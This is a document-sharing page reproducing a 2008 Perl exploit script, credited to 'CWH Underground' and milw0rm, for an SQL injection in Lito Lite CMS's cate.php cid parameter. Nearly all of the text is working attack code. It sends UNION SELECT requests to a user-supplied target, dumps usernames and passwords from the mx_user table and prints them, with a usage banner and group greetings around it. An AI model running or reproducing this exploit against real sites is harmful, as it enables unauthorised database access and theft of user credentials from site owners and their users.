Get documents about "Lito Lite CMS cate.php cid Remote SQL Injection Exploit
Document Sample
Lito Lite CMS cate.php cid Remote SQL Injection Exploit Page 1/2
1 #!/usr/bin/perl −w
2 #===========================================================
3 # Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
4 #===========================================================
5 #
6 # ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
7 # | ||||||||| ‘−−−−−−−−’ | O .. CWH Underground Hacking Team ..
8 # ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
9 # ‘\_,−−−−−−−, _________________________|
10 # / XXXXXX /‘| /
11 # / XXXXXX / ‘\ /
12 # / XXXXXX /\______(
13 # / XXXXXX /
14 # / XXXXXX /
15 # (________(
16 # ‘−−−−−−’
17 #
18 #AUTHOR : CWH Underground
19 #DATE : 29 November 2008
20 #SITE : cwh.citec.us
21 #
22 #
23 #####################################################
24 #APPLICATION : Lito Lite CMS
25 #DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip
26 ######################################################
27 #
28 #Note: magic_quotes_gpc = off
29 #
30 #######################################################################################
31 #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
32 #Special Thx : asylu3, str0ke, citec.us, milw0rm.com
33 #######################################################################################
34
35
36 use LWP::UserAgent;
37 use HTTP::Request;
38
39 if ($#ARGV+1 != 2)
40 {
41 print "\n==============================================\n";
42 print " Lito Lite Remote SQL Injection Exploit \n";
43 print " \n";
44 print " Discovered By CWH Underground \n";
45 print "==============================================\n";
46 print " \n";
47 print " ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−, \n";
48 print " | ||||||||| ‘−−−−−−−−’ | O \n";
49 print " ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−| \n";
50 print " ‘\_,−−−−−−−, _________________________| \n";
51 print " / XXXXXX /‘| / \n";
52 print " / XXXXXX / ‘\ / \n";
CWH Underground 11/29/2008
Lito Lite CMS cate.php cid Remote SQL Injection Exploit Page 2/2
53 print " / XXXXXX /\______( \n";
54 print " / XXXXXX / \n";
55 print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
56 print " (________( \n";
57 print " ‘−−−−−−’ \n";
58 print " \n";
59 print "Usage : ./xpl.pl <Target> <Data Limit>\n";
60 print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
61 exit();
62 }
63
64 $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: ’http://’ . $ARGV[0];
65 $number = $ARGV[1];
66
67 print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
68 print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
69 print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
70 print "\n[+]Dump Username and Password\n";
71
72 for ($start=0;$start<$number;$start++) {
73
74 $xpl = LWP::UserAgent−>new() or die "Could not initialize browser\n";
75 $req = HTTP::Request−>new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x
3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."−−+and+1=1")or die "Failed to Connect, Try again!\n";
76 $res = $xpl−>request($req);
77 $info = $res−>content;
78 $count=$start+1;
79
80 if ($info =~ /:::(.+):::/)
81 {
82 $dump=$1;
83 ($username,$password)= split(’::’,$dump);
84 printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
85 }
86 else {
87 print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
88 exit;
89 }
90 }
91
92 # milw0rm.com [2008−11−29]
CWH Underground 11/29/2008
